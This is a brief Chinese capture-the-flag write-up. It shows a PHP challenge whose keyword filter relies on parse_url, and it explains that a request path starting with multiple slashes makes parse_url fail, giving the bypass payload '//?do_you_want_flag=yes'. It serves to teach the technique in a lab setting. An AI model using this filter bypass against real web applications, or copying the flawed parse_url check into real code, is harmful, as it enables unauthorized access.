parse_url函数在解析url时存在的bug
代码如下:
<?php error_reporting(0); require __DIR__."/flag.php"; $url = urldecode($_SERVER['REQUEST_URI']); $url_query = parse_url($url, PHP_URL_QUERY); $params = explode("&", $url_query); foreach($params as $param){ $idx_equal = strpos($param, "="); if($idx_equal === false){ $key = $param; $value = ""; }else{ $key = substr($param, 0, $idx_equal); $value = substr($param, $idx_equal + 1); } if(strpos($key, "do_you_want_flag") !== false || strpos($value, "yes") !== false){ die("no hack"); } } if(isset($_GET['do_you_want_flag']) && $_GET['do_you_want_flag'] == "yes"){ die($flag); } highlight_file(__FILE__);
变量do_you_want_flag应该等于yes,
这一个题目我们可以发现存在parse_url函数,这个函数有个漏洞可以用多个/符号去绕过,然后就不会执行die("no hack");
所以payload很简单:
//?do_you_want_flag=yes